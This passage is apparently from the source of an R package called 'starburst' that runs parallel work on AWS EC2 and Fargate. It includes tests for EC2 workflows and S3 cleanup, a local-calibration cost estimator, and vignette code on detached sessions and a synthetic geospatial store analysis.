                function() list(auto_cleanup_s3 = TRUE))
  expect_true(should_cleanup_s3())

  # Config unset -> default TRUE
  mockery::stub(should_cleanup_s3, "get_starburst_config", function() list())
  expect_true(should_cleanup_s3())
})

test_that("should_cleanup_s3 option overrides config", {
  withr::local_options(starburst.cleanup_s3 = FALSE)
  # Even if config said TRUE, the explicit option wins.
  expect_false(should_cleanup_s3())
})

# End-to-end integration test for EC2
# This test creates a warm pool, runs tasks, and verifies results
# Run manually with: testthat::test_file("tests/testthat/test-ec2-e2e.R")

test_that("EC2 end-to-end workflow works", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip_if_not(is_setup_complete(), "starburst not configured")
  skip("Manual test - runs real EC2 instances")  # Remove this line to run

  library(future)
  library(future.apply)

  # Configure EC2 backend
  plan(starburst,
       workers = 2,
       cpu = 2,
       memory = "4GB",
       launch_type = "EC2",
       instance_type = "c6a.large",
       use_spot = FALSE,
       warm_pool_timeout = 600,
       region = "us-east-1"
  )

  # Test function
  test_fn <- function(x) {
    Sys.sleep(1)  # Simulate work
    list(
      input = x,
      result = x^2,
      platform = Sys.info()[["machine"]],
      hostname = Sys.info()[["nodename"]]
    )
  }

  # Run tasks
  start_time <- Sys.time()
  results <- future_lapply(1:4, test_fn)
  elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))

  # Verify results
  expect_equal(length(results), 4)
  expect_equal(results[[1]]$input, 1)
  expect_equal(results[[1]]$result, 1)
  expect_equal(results[[2]]$result, 4)
  expect_equal(results[[3]]$result, 9)
  expect_equal(results[[4]]$result, 16)

  # All results should be from x86_64 platform (c6a.large)
  platforms <- sapply(results, function(r) r$platform)
  expect_true(all(platforms == "x86_64"))

  # Cleanup
  plan(sequential)

  # Print timing info
  message(sprintf("E2E test completed in %.1f seconds", elapsed))
})

test_that("Spot instances can be configured", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip_if_not(is_setup_complete(), "starburst not configured")
  skip("Manual test - uses spot instances")  # Remove to run

  library(future)

  # Configure with spot
  plan(starburst,
       workers = 2,
       launch_type = "EC2",
       instance_type = "c6a.large",
       use_spot = TRUE,  # Use spot for cost savings
       region = "us-east-1"
  )

  backend <- plan()[[1]]

  expect_equal(backend$use_spot, TRUE)
  expect_equal(backend$instance_type, "c6a.large")

  plan(sequential)
})

test_that("Multiple instance types can be used", {
  skip_on_cran()
  skip("Manual test - creates multiple capacity providers")

  # Setup EC2 for multiple instance types
  starburst_setup_ec2(
    region = "us-east-1",
    instance_types = c("c6a.large", "m6a.large"),
    force = FALSE
  )

  # Verify capacity providers exist
  ecs <- get_ecs_client("us-east-1")
  providers <- ecs$describe_capacity_providers(
    capacityProviders = list("starburst-c6a-large", "starburst-m6a-large")
  )

  expect_equal(length(providers$capacityProviders), 2)
})

test_that("ARM64 instances work with multi-platform images", {
  skip_on_cran()
  skip_if_not(check_aws_credentials(), "AWS credentials not available")
  skip("Manual test - uses ARM64 Graviton instances")  # Remove to run

  library(future)
  library(future.apply)

  # Configure ARM64 backend (Graviton)
  plan(starburst,
       workers = 2,
       launch_type = "EC2",
       instance_type = "c7g.xlarge",  # Graviton3
       use_spot = FALSE,
       region = "us-east-1"
  )

  # Test function
  test_fn <- function(x) {
    list(
      result = x * 2,
      platform = Sys.info()[["machine"]]
    )
  }

  # Run task
  results <- future_lapply(1:2, test_fn)

  # Verify ARM64 platform
  platforms <- sapply(results, function(r) r$platform)
  expect_true(all(platforms == "aarch64"))  # ARM64 architecture

  plan(sequential)
})

test_that("Warm pool timeout works", {
  skip_on_cran()
  skip("Manual test - tests timeout behavior")

  config <- get_starburst_config()

  backend <- list(
    cluster_name = config$cluster_name,
    region = config$region,
    launch_type = "EC2",
    instance_type = "c6a.large",
    asg_name = "starburst-asg-c6a-large",
    warm_pool_timeout = 300,  # 5 minutes
    pool_started_at = Sys.time() - 400  # Started 6 min ago
  )

  # Check if pool should scale down
  idle_time <- difftime(Sys.time(), backend$pool_started_at, units = "secs")

  expect_true(idle_time > backend$warm_pool_timeout)

  # In real cleanup, this would trigger scale-down
  # cleanup_cluster(backend)  # Would scale to 0
})

test_that("Cost estimates are accurate", {
  # Test various configurations
  cost1 <- estimate_cost(10, 4, "8GB", 1, "EC2", "c6a.large", FALSE)
  cost2 <- estimate_cost(10, 4, "8GB", 1, "EC2", "c6a.large", TRUE)

  # Spot should be cheaper
  expect_true(cost2$total_estimated < cost1$total_estimated)

  # More workers = higher cost
  cost3 <- estimate_cost(20, 4, "8GB", 1, "EC2", "c6a.large", FALSE)
  expect_true(cost3$total_estimated > cost1$total_estimated)

  # Longer runtime = higher cost
  cost4 <- estimate_cost(10, 4, "8GB", 2, "EC2", "c6a.large", FALSE)
  expect_true(cost4$total_estimated > cost1$total_estimated)
})

#' Estimate Cloud Performance and Cost
#'
#' Runs a small sample of tasks locally to estimate cloud execution time and cost.
#' Provides informed prediction before spending money on cloud execution.
#'
#' @param .x A vector or list to iterate over
#' @param .f A function to apply to each element
#' @param workers Number of parallel workers to estimate for
#' @param cpu CPU units per worker (1, 2, 4, 8, or 16)
#' @param memory Memory per worker (e.g., "8GB")
#' @param platform CPU architecture: "X86_64" (default) or "ARM64" (Graviton3)
#' @param sample_size Number of items to run locally for estimation (default: 10)
#' @param region AWS region
#' @param ... Additional arguments passed to .f
#'
#' @return Invisible list with estimates, prints summary to console
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # Estimate before running
#'   starburst_estimate(1:1000, expensive_function, workers = 50)
#'
#'   # Then decide whether to proceed
#'   results <- starburst_map(1:1000, expensive_function, workers = 50)
#' }
#' }
starburst_estimate <- function(.x, .f, workers = 10, cpu = 2, memory = "8GB",
                               platform = "X86_64", sample_size = 10,
                               region = NULL, ...) {

  n_total <- length(.x)

  # Validate inputs
  validate_workers(workers)
  validate_cpu(cpu)
  validate_memory(memory)
  validate_platform(platform)

  if (sample_size > n_total) {
    sample_size <- n_total
  }

  cat_info(sprintf("[Check] Running local calibration with %d sample tasks...\n", sample_size))

  # Get local hardware specs
  local_specs <- get_local_hardware_specs()
  cat_info(sprintf("[OK] Detected: %s (%d cores)\n", local_specs$cpu_name, local_specs$cores))

  # Run sample locally
  sample_indices <- if (n_total <= sample_size) {
    seq_along(.x)
  } else {
    sample(seq_along(.x), sample_size)
  }

  sample_data <- .x[sample_indices]

  # Time the sample
  start_time <- Sys.time()
  if (length(list(...)) > 0) {
    extra_args <- list(...)
    results_sample <- lapply(sample_data, function(item) {
      do.call(.f, c(list(item), extra_args))
    })
  } else {
    results_sample <- lapply(sample_data, .f)
  }
  elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))

  avg_time_per_task <- elapsed / sample_size

  cat_info(sprintf("[OK] Sample complete: %.2f seconds per task average\n\n", avg_time_per_task))

  # Calculate predictions
  predictions <- calculate_predictions(
    n_total = n_total,
    avg_time_per_task = avg_time_per_task,
    local_specs = local_specs,
    workers = workers,
    cpu = cpu,
    memory = parse_memory(memory),
    platform = platform
  )

  # Print comparison
  print_estimate_summary(predictions, local_specs)

  invisible(predictions)
}

#' Get Local Hardware Specifications
#'
#' Detects local CPU model and core count for performance estimation.
#'
#' @return List with cpu_name, cores, and architecture
#' @keywords internal
get_local_hardware_specs <- function() {
  os <- Sys.info()["sysname"]

  if (os == "Darwin") {
    # macOS
    cpu_brand <- trimws(safe_system("sysctl", c("-n", "machdep.cpu.brand_string"), stdout = TRUE)$stdout)

    # Try to get performance cores (Apple Silicon)
    perf_cores <- tryCatch({
      as.numeric(trimws(safe_system("sysctl", c("-n", "hw.perflevel0.physicalcpu"), stdout = TRUE)$stdout))
    }, error = function(e) {
      # Fallback to total physical cores
      as.numeric(trimws(safe_system("sysctl", c("-n", "hw.physicalcpu"), stdout = TRUE)$stdout))
    })

    # Detect if ARM (Apple Silicon)
    arch <- trimws(safe_system("uname", c("-m"), stdout = TRUE)$stdout)

    list(
      cpu_name = cpu_brand,
      cores = perf_cores,
      architecture = if (grepl("arm", arch, ignore.case = TRUE)) "ARM64" else "X86_64"
    )

  } else if (os == "Linux") {
    # Linux
    # Read CPU info directly (safer than shell pipeline)
    cpu_info_lines <- readLines("/proc/cpuinfo")
    model_line <- grep("^model name", cpu_info_lines, value = TRUE)[1]
    cpu_name <- sub("model name\\s*:\\s*", "", model_line)

    cores <- as.numeric(trimws(safe_system("nproc", character(), stdout = TRUE)$stdout))

    arch <- trimws(safe_system("uname", c("-m"), stdout = TRUE)$stdout)

    list(
      cpu_name = cpu_name,
      cores = cores,
      architecture = if (grepl("aarch64|arm64", arch, ignore.case = TRUE)) "ARM64" else "X86_64"
    )

  } else if (os == "Windows") {
    # Windows
    cpu_name <- Sys.getenv("PROCESSOR_IDENTIFIER")
    cores <- as.numeric(Sys.getenv("NUMBER_OF_PROCESSORS"))

    list(
      cpu_name = cpu_name,
      cores = cores,
      architecture = "X86_64"  # Assume x86 for Windows
    )

  } else {
    # Unknown OS, use parallel package
    list(
      cpu_name = "Unknown",
      cores = parallel::detectCores(),
      architecture = "Unknown"
    )
  }
}

#' Calculate Cloud Performance Predictions
#'
#' @keywords internal
calculate_predictions <- function(n_total, avg_time_per_task, local_specs,
                                  workers, cpu, memory, platform) {

  # Sequential time
  sequential_time <- n_total * avg_time_per_task

  # Local parallel time (ideal)
  local_parallel_time <- sequential_time / local_specs$cores

  # Cloud performance ratio (AWS vs local)
  # These are empirical ratios from benchmarking
  performance_ratio <- get_cloud_performance_ratio(local_specs, platform)

  # Cloud parallel time (accounting for slower per-core performance)
  cloud_parallel_time <- (sequential_time / workers) / performance_ratio

  # Add startup overhead (empirical - will be updated from profiling data)
  # TODO: Update these values from profiling results
  startup_overhead <- 600  # 10 minutes in seconds (placeholder)

  # Add straggler buffer (empirical - tasks don't all finish at exactly same time)
  straggler_factor <- 1.15  # 15% buffer (placeholder)

  cloud_total_time <- (startup_overhead + cloud_parallel_time) * straggler_factor

  # Cost estimation
  hours <- cloud_total_time / 3600
  vCPU_cost_per_hour <- 0.04048
  memory_cost_per_gb_hour <- 0.004445
  cpu_cost <- workers * cpu * vCPU_cost_per_hour * hours
  mem_cost <- workers * memory * memory_cost_per_gb_hour * hours
  cost <- cpu_cost + mem_cost

  # Speedup calculations
  speedup_vs_sequential <- sequential_time / cloud_total_time
  speedup_vs_local_parallel <- local_parallel_time / cloud_total_time

  list(
    n_tasks = n_total,
    avg_time_per_task = avg_time_per_task,
    sequential_time = sequential_time,
    local_parallel_time = local_parallel_time,
    cloud_time = cloud_total_time,
    cloud_startup_overhead = startup_overhead,
    cloud_compute_time = cloud_parallel_time,
    cost = cost,
    speedup_vs_sequential = speedup_vs_sequential,
    speedup_vs_local_parallel = speedup_vs_local_parallel,
    performance_ratio = performance_ratio,
    workers = workers,
    cpu = cpu,
    memory = memory,
    platform = platform
  )
}

#' Get Cloud Performance Ratio
#'
#' Returns estimated per-core performance of cloud vs local hardware.
#' Based on empirical benchmarking data.
#'
#' @keywords internal
get_cloud_performance_ratio <- function(local_specs, platform) {
  cpu_name <- local_specs$cpu_name
  local_arch <- local_specs$architecture

  # M4 Pro baseline (from benchmarking)
  if (grepl("M4 Pro", cpu_name, ignore.case = TRUE)) {
    if (platform == "ARM64") {
      # Graviton3 vs M4 Pro: ~55% per-core performance
      return(0.55)
    } else {
      # Default Fargate x86 vs M4 Pro: ~42% per-core performance
      return(0.42)
    }
  }

  # M3 family (estimate based on M4 data)
  if (grepl("M3", cpu_name, ignore.case = TRUE)) {
    if (platform == "ARM64") {
      return(0.60)  # Graviton3 closer to M3 performance
    } else {
      return(0.45)
    }
  }

  # Intel/AMD x86 local machines
  if (local_arch == "X86_64") {
    # Assume modern desktop/laptop Intel/AMD
    if (platform == "ARM64") {
      return(0.85)  # Graviton3 vs typical Intel/AMD
    } else {
      return(0.75)  # Fargate x86 vs typical Intel/AMD
    }
  }

  # Conservative default
  if (platform == "ARM64") {
    return(0.70)
  } else {
    return(0.60)
  }
}

#' Print Estimate Summary
#'
#' @keywords internal
print_estimate_summary <- function(pred, local_specs) {
  cat_info("============================================================\n")
  cat_info("|  EXECUTION TIME & COST ESTIMATES                         |\n")
  cat_info("============================================================\n\n")

  # Format times
  format_time <- function(seconds) {
    if (seconds < 120) {
      sprintf("%.1f sec", seconds)
    } else if (seconds < 7200) {
      sprintf("%.1f min", seconds / 60)
    } else {
      sprintf("%.1f hours", seconds / 3600)
    }
  }

  cat(sprintf("[Status] Workload: %d tasks, %.2f sec/task average\n\n",
              pred$n_tasks, pred$avg_time_per_task))

  cat(sprintf("Local Options:\n"))
  cat(sprintf("  Sequential (1 core):      %s\n", format_time(pred$sequential_time)))
  cat(sprintf("  Parallel (%d cores):       %s\n",
              local_specs$cores, format_time(pred$local_parallel_time)))
  cat("\n")

  cat(sprintf("Cloud Option:\n"))
  cat(sprintf("  %d workers (%s):         %s\n",
              pred$workers, pred$platform, format_time(pred$cloud_time)))
  cat(sprintf("    Startup overhead:       %s\n", format_time(pred$cloud_startup_overhead)))
  cat(sprintf("    Compute time:           %s\n", format_time(pred$cloud_compute_time)))
  cat(sprintf("    Estimated cost:         $%.2f\n", pred$cost))
  cat("\n")

  cat(sprintf("Speedup:\n"))
  cat(sprintf("  vs Sequential:            %.1fx faster\n", pred$speedup_vs_sequential))

  if (pred$speedup_vs_local_parallel > 1.3) {
    cat(sprintf("  vs Local Parallel:        %.1fx faster [OK]\n", pred$speedup_vs_local_parallel))
    cat("\n")
    cat_success("[TIP] Recommendation: Cloud execution is significantly faster\n")
  } else if (pred$speedup_vs_local_parallel > 1.05) {
    cat(sprintf("  vs Local Parallel:        %.1fx faster [WARNING]\n", pred$speedup_vs_local_parallel))
    cat("\n")
    cat_info(sprintf("[TIP] Recommendation: Cloud is slightly faster but consider cost ($%.2f)\n", pred$cost))
  } else {
    cat(sprintf("  vs Local Parallel:        %.2fx (slower!) [WARNING]\n", pred$speedup_vs_local_parallel))
    cat("\n")
    cat_warn("[TIP] Recommendation: Local parallel execution is better for this workload\n")
    cat_warn(sprintf("   Startup overhead (%.1f min) is too high relative to task duration\n",
                pred$cloud_startup_overhead / 60))
  }

  cat("\n")
}

# Note: estimate_cost() is defined in R/cost.R (single source of truth).
# A scalar-returning variant previously lived here but was shadowed at load
# time by the launch-type-aware version and all callers expect that one.

#' Parse Memory String
# Note: parse_memory() is defined in R/plan-starburst.R

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE  # Don't run in build
)

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Create a detached session (EC2 workers with Spot by default)
# session <- starburst_session(
#   workers = 10,
#   cpu = 4,
#   memory = "8GB"
# )
# 
# # Submit tasks
# task_ids <- lapply(1:100, function(i) {
#   session$submit(quote({
#     # Your long-running computation
#     result <- expensive_analysis(i)
#     result
#   }))
# })
# 
# # Save session ID for later
# session_id <- session$session_id
# print(session_id)  # "session-abc123..."

## -----------------------------------------------------------------------------
# # Check progress anytime
# status <- session$status()
# print(status)
# # Session Status:
# #   Total tasks:     100
# #   Pending:         25
# #   Running:         10
# #   Completed:       60
# #   Failed:          5
# #   Progress:        60.0%

## -----------------------------------------------------------------------------
# # Collect completed results (non-blocking)
# results <- session$collect(wait = FALSE)
# length(results)  # 60 (only completed so far)
# 
# # Or wait for all to complete
# results <- session$collect(wait = TRUE, timeout = 3600)
# length(results)  # 100 (all tasks)

## -----------------------------------------------------------------------------
# # Session 1: Start work
# session <- starburst_session(workers = 20)
# lapply(1:1000, function(i) session$submit(quote(slow_computation(i))))
# session_id <- session$session_id
# 
# # Close R, go home, come back tomorrow...
# 
# # Session 2: Reattach
# session <- starburst_session_attach(session_id)
# status <- session$status()
# results <- session$collect()

## -----------------------------------------------------------------------------
# sessions <- starburst_list_sessions()
# print(sessions)
# #   session_id         created_at           last_activity        total_tasks pending running completed failed
# #   session-abc123     2026-02-06 10:00:00  2026-02-06 10:15:00  100         0       5       90        5
# #   session-def456     2026-02-05 14:30:00  2026-02-05 18:45:00  500         0       0       500       0

## -----------------------------------------------------------------------------
# # Extend session timeout by 1 hour
# session$extend(seconds = 3600)

## -----------------------------------------------------------------------------
# # Stop workers and mark the session terminated. S3 objects are PRESERVED by
# # default, so you can still reattach and collect afterwards.
# session$cleanup()
# 
# # To also delete the session's S3 task/result objects, pass force = TRUE:
# session$cleanup(force = TRUE)

## -----------------------------------------------------------------------------
# # Default is already EC2 + Spot (c7g.xlarge); override the instance type if you like
# session <- starburst_session(
#   workers = 50,
#   instance_type = "c8a.xlarge",  # AMD 8th gen; auto-provisioned on first use
#   use_spot = TRUE                 # default TRUE — ~70% cheaper
# )
# 
# # Opt into the Fargate backend (serverless, task-based) instead
# session <- starburst_session(
#   workers = 50,
#   launch_type = "FARGATE"
# )

## -----------------------------------------------------------------------------
# # Tasks that fail are tracked, not silently dropped
# session <- starburst_session(workers = 5)
# 
# task_ids <- lapply(1:10, function(i) {
#   session$submit(quote({
#     if (i == 5) stop("Intentional error")
#     i * 2
#   }), globals = list(i = i))
# })
# 
# # Check status
# status <- session$status()
# print(status)   # Failed: 1
# 
# # collect() returns an entry for EVERY task, keyed by task id. A failed task
# # comes back as a structured failure (error = TRUE) alongside the successes.
# results <- session$collect(wait = TRUE)
# 
# # Separate successes from failures
# failures <- Filter(function(r) isTRUE(r$error), results)
# length(failures)                 # 1
# print(failures[[1]]$message)     # "Intentional error"
# 
# # Successful values are the non-error entries
# successes <- Filter(function(r) !isTRUE(r$error), results)

## -----------------------------------------------------------------------------
# session <- starburst_session(workers = 10)
# 
# # Submit mix of fast and slow tasks
# lapply(1:5, function(i) session$submit(quote(i * 2)))        # Fast
# lapply(1:5, function(i) session$submit(quote({ Sys.sleep(60); i })))  # Slow
# 
# Sys.sleep(10)
# 
# # Get fast results immediately
# results <- session$collect(wait = FALSE)
# length(results)  # 5 (fast tasks done)
# 
# # Later, get remaining results
# Sys.sleep(60)
# results <- session$collect(wait = FALSE)
# length(results)  # 10 (all done)

## -----------------------------------------------------------------------------
# # Start with fewer workers, let them process queue
# session <- starburst_session(workers = 5)
# 
# # Submit large batch
# lapply(1:1000, function(i) session$submit(quote(work(i))))
# 
# # Workers process tasks continuously until queue empty
# # Then auto-terminate after 5 min idle

## -----------------------------------------------------------------------------
# # Cost-effective setup
# session <- starburst_session(
#   workers = 20,
#   launch_type = "EC2",
#   instance_type = "c8a.xlarge",
#   use_spot = TRUE,
#   session_timeout = 3600,
#   absolute_timeout = 86400
# )

## -----------------------------------------------------------------------------
# # Error: Session not found: session-xyz
# # - Check session ID is correct
# # - Verify region matches (use region parameter)
# # - Session may have expired (check absolute_timeout)

## -----------------------------------------------------------------------------
# # Check session status
# status <- session$status()
# 
# # If pending tasks stuck:
# # - Workers may have terminated (check idle timeout)
# # - Launch more workers: (not yet implemented)
# # - Check CloudWatch logs: starburst_logs(session_id)

## -----------------------------------------------------------------------------
# # Workers exit after 5 min idle by default
# # For sporadic task submission, relaunch workers periodically
# # (Auto-scaling based on pending tasks coming in future release)

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Process 1000 samples overnight
# session <- starburst_session(
#   workers = 100,
#   cpu = 8,
#   memory = "32GB",
#   launch_type = "EC2",
#   use_spot = TRUE
# )
# 
# # Submit all samples
# sample_files <- list.files("samples/", pattern = "*.fastq")
# task_ids <- lapply(sample_files, function(file) {
#   session$submit(quote({
#     library(Rsubread)
#     results <- align_and_quantify(file)
#     save_results(results, file)
#     results
#   }))
# })
# 
# # Check progress next morning
# session <- starburst_session_attach(session$session_id)
# status <- session$status()
# # Completed: 950, Running: 45, Failed: 5
# 
# results <- session$collect(wait = TRUE)

## -----------------------------------------------------------------------------
# # Run 10,000 simulations
# session <- starburst_session(workers = 50)
# 
# n_sims <- 10000
# lapply(1:n_sims, function(i) {
#   session$submit(quote({
#     set.seed(i)
#     run_simulation()
#   }))
# })
# 
# # Check progress periodically
# repeat {
#   status <- session$status()
#   print(sprintf("Progress: %.1f%%", 100 * status$completed / status$total))
# 
#   if (status$completed == n_sims) break
#   Sys.sleep(60)
# }
# 
# results <- session$collect()

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(789)
# 
# # Define 20 metropolitan regions (simplified coordinates)
# regions <- data.frame(
#   region_id = 1:20,
#   region_name = c("New York", "Los Angeles", "Chicago", "Houston", "Phoenix",
#                  "Philadelphia", "San Antonio", "San Diego", "Dallas", "San Jose",
#                  "Austin", "Jacksonville", "Fort Worth", "Columbus", "Charlotte",
#                  "San Francisco", "Indianapolis", "Seattle", "Denver", "Boston"),
#   center_lat = c(40.71, 34.05, 41.88, 29.76, 33.45,
#                 39.95, 29.42, 32.72, 32.78, 37.34,
#                 30.27, 30.33, 32.75, 39.96, 35.23,
#                 37.77, 39.77, 47.61, 39.74, 42.36),
#   center_lon = c(-74.01, -118.24, -87.63, -95.37, -112.07,
#                 -75.17, -98.49, -117.16, -96.80, -121.89,
#                 -97.74, -81.66, -97.33, -83.00, -80.84,
#                 -122.42, -86.16, -122.33, -104.99, -71.06),
#   stringsAsFactors = FALSE
# )
# 
# # Generate store locations (5 per region)
# stores <- do.call(rbind, lapply(1:nrow(regions), function(i) {
#   n_stores <- 5
#   # Add random offset to region center
#   data.frame(
#     store_id = (i - 1) * n_stores + 1:n_stores,
#     region_id = regions$region_id[i],
#     region_name = regions$region_name[i],
#     latitude = regions$center_lat[i] + rnorm(n_stores, 0, 0.1),
#     longitude = regions$center_lon[i] + rnorm(n_stores, 0, 0.1),
#     annual_revenue = rlnorm(n_stores, log(1000000), 0.5),
#     stringsAsFactors = FALSE
#   )
# }))
# 
# # Generate competitor locations (10 per region)
# competitors <- do.call(rbind, lapply(1:nrow(regions), function(i) {
#   n_competitors <- 10
#   data.frame(
#     competitor_id = (i - 1) * n_competitors + 1:n_competitors,
#     region_id = regions$region_id[i],
#     latitude = regions$center_lat[i] + rnorm(n_competitors, 0, 0.15),
#     longitude = regions$center_lon[i] + rnorm(n_competitors, 0, 0.15),
#     stringsAsFactors = FALSE
#   )
# }))
# 
# # Generate customer points (1000 per region)
# customers <- do.call(rbind, lapply(1:nrow(regions), function(i) {
#   n_customers <- 1000
#   data.frame(
#     customer_id = (i - 1) * n_customers + 1:n_customers,
#     region_id = regions$region_id[i],
#     latitude = regions$center_lat[i] + rnorm(n_customers, 0, 0.2),
#     longitude = regions$center_lon[i] + rnorm(n_customers, 0, 0.2),
#     annual_spend = rlnorm(n_customers, log(500), 0.8),
#     stringsAsFactors = FALSE
#   )
# }))
# 
# cat(sprintf("Dataset created:\n"))
# cat(sprintf("  %d stores across %d regions\n", nrow(stores), nrow(regions)))
# cat(sprintf("  %s competitors\n", format(nrow(competitors), big.mark = ",")))
# cat(sprintf("  %s customers\n", format(nrow(customers), big.mark = ",")))

## ----spatial-fn, eval=FALSE---------------------------------------------------
# # Haversine distance function (in km)
# haversine_distance <- function(lat1, lon1, lat2, lon2) {
#   R <- 6371  # Earth's radius in km
# 
#   lat1_rad <- lat1 * pi / 180
#   lat2_rad <- lat2 * pi / 180
#   delta_lat <- (lat2 - lat1) * pi / 180
#   delta_lon <- (lon2 - lon1) * pi / 180
# 
#   a <- sin(delta_lat/2)^2 +
#        cos(lat1_rad) * cos(lat2_rad) * sin(delta_lon/2)^2
#   c <- 2 * atan2(sqrt(a), sqrt(1-a))
# 
#   R * c
# }
# 
# analyze_region <- function(region_id, stores_data, competitors_data,
#                           customers_data) {
#   # Filter data for this region
#   region_stores <- stores_data[stores_data$region_id == region_id, ]
#   region_competitors <- competitors_data[competitors_data$region_id == region_id, ]
#   region_customers <- customers_data[customers_data$region_id == region_id, ]
# 
#   if (nrow(region_stores) == 0) {
#     return(NULL)
#   }
# 
#   # Analyze each store
#   store_metrics <- lapply(1:nrow(region_stores), function(i) {
#     store <- region_stores[i, ]
# 
#     # Distance to nearest competitor
#     competitor_distances <- sapply(1:nrow(region_competitors), function(j) {
#       haversine_distance(
#         store$latitude, store$longitude,
#         region_competitors$latitude[j], region_competitors$longitude[j]
#       )
#     })
#     nearest_competitor_km <- min(competitor_distances)
#     avg_competitor_distance <- mean(competitor_distances)
#     competitors_within_5km <- sum(competitor_distances <= 5)
# 
#     # Customer coverage analysis
#     customer_distances <- sapply(1:nrow(region_customers), function(j) {
#       haversine_distance(
#         store$latitude, store$longitude,
#         region_customers$latitude[j], region_customers$longitude[j]
#       )
#     })
# 
#     # Customers within radius
#     customers_1km <- sum(customer_distances <= 1)
#     customers_3km <- sum(customer_distances <= 3)
#     customers_5km <- sum(customer_distances <= 5)
#     customers_10km <- sum(customer_distances <= 10)
# 
#     # Market potential (customers within 5km)
#     nearby_customers <- region_customers[customer_distances <= 5, ]
#     market_potential <- if (nrow(nearby_customers) > 0) {
#       sum(nearby_customers$annual_spend)
#     } else {
#       0
#     }
# 
#     # Average distance to customers
#     avg_customer_distance <- mean(customer_distances)
#     median_customer_distance <- median(customer_distances)
# 
#     # Spatial density (customers per km² within 10km radius)
#     area_10km <- pi * 10^2  # ~314 km²
#     customer_density <- customers_10km / area_10km
# 
#     # Competitive intensity score (0-1, higher = more competitive)
#     competitive_intensity <- min(1, competitors_within_5km / 10)
# 
#     data.frame(
#       store_id = store$store_id,
#       region_id = region_id,
#       region_name = store$region_name,
#       annual_revenue = store$annual_revenue,
#       nearest_competitor_km = nearest_competitor_km,
#       avg_competitor_distance = avg_competitor_distance,
#       competitors_within_5km = competitors_within_5km,
#       customers_1km = customers_1km,
#       customers_3km = customers_3km,
#       customers_5km = customers_5km,
#       customers_10km = customers_10km,
#       market_potential = market_potential,
#       avg_customer_distance = avg_customer_distance,
#       median_customer_distance = median_customer_distance,
#       customer_density = customer_density,
#       competitive_intensity = competitive_intensity,
#       stringsAsFactors = FALSE
#     )
#   })
# 
#   do.call(rbind, store_metrics)
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Analyze 3 regions locally
# test_regions <- c(1, 2, 3)
# 
# cat(sprintf("Analyzing %d regions locally...\n", length(test_regions)))
# local_start <- Sys.time()
# 
# local_results <- lapply(test_regions, analyze_region,
#                        stores_data = stores,
#                        competitors_data = competitors,
#                        customers_data = customers)
# local_metrics <- do.call(rbind, local_results)
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("[OK] Completed in %.2f seconds\n", local_time))
# cat(sprintf("  Processed %d stores\n", nrow(local_metrics)))
# cat(sprintf("  Estimated time for all %d regions: %.1f seconds\n",
#             nrow(regions), local_time * (nrow(regions) / length(test_regions))))

## ----cloud, eval=FALSE--------------------------------------------------------
# n_workers <- 20
# 
# cat(sprintf("Analyzing %d regions on %d workers...\n", nrow(regions), n_workers))
# 
# cloud_start <- Sys.time()
# 
# results <- starburst_map(
#   regions$region_id,
#   analyze_region,
#   stores_data = stores,
#   competitors_data = competitors,
#   customers_data = customers,
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))
# 
# cat(sprintf("\n[OK] Completed in %.1f seconds\n", cloud_time))
# 
# # Combine results
# spatial_metrics <- do.call(rbind, results)

## ----analysis, eval=FALSE-----------------------------------------------------
# cat("\n=== Geospatial Analysis Results ===\n\n")
# cat(sprintf("Total stores analyzed: %d\n", nrow(spatial_metrics)))
# cat(sprintf("Regions covered: %d\n\n", length(unique(spatial_metrics$region_id))))
# 
# # Competition metrics
# cat("=== Competition Analysis ===\n")
# cat(sprintf("Average distance to nearest competitor: %.2f km\n",
#             mean(spatial_metrics$nearest_competitor_km)))
# cat(sprintf("Median distance to nearest competitor: %.2f km\n",
#             median(spatial_metrics$nearest_competitor_km)))
# cat(sprintf("Average competitors within 5km: %.1f\n",
#             mean(spatial_metrics$competitors_within_5km)))
# cat(sprintf("Stores with high competition (5+ competitors within 5km): %d (%.1f%%)\n\n",
#             sum(spatial_metrics$competitors_within_5km >= 5),
#             mean(spatial_metrics$competitors_within_5km >= 5) * 100))
# 
# # Customer coverage
# cat("=== Customer Coverage Analysis ===\n")
# cat(sprintf("Average customers within 5km: %.0f\n",
#             mean(spatial_metrics$customers_5km)))
# cat(sprintf("Average market potential (5km radius): $%.0f\n",
#             mean(spatial_metrics$market_potential)))
# cat(sprintf("Average customer density: %.1f customers/km²\n",
#             mean(spatial_metrics$customer_density)))
# cat(sprintf("Median distance to customers: %.2f km\n\n",
#             mean(spatial_metrics$median_customer_distance)))
# 
# # Store performance correlation
# cat("=== Performance Insights ===\n")
# correlation <- cor(spatial_metrics$annual_revenue,
#                    spatial_metrics$market_potential)
# cat(sprintf("Correlation (revenue vs market potential): %.3f\n", correlation))
# 
# # Identify opportunity stores
# opportunity_stores <- spatial_metrics[
#   spatial_metrics$market_potential > median(spatial_metrics$market_potential) &
#   spatial_metrics$competitors_within_5km < median(spatial_metrics$competitors_within_5km),
# ]
# cat(sprintf("\nHigh opportunity stores (low competition, high potential): %d\n",
#             nrow(opportunity_stores)))
# if (nrow(opportunity_stores) > 0) {
#   cat(sprintf("  Average market potential: $%.0f\n",
#               mean(opportunity_stores$market_potential)))
#   cat(sprintf("  Average competitors nearby: %.1f\n",
#               mean(opportunity_stores$competitors_within_5km)))
# }
# 
# # Identify challenged stores
# challenged_stores <- spatial_metrics[
#   spatial_metrics$competitive_intensity > 0.7 &
#   spatial_metrics$market_potential < median(spatial_metrics$market_potential),
# ]
# cat(sprintf("\nChallenged stores (high competition, low potential): %d\n",
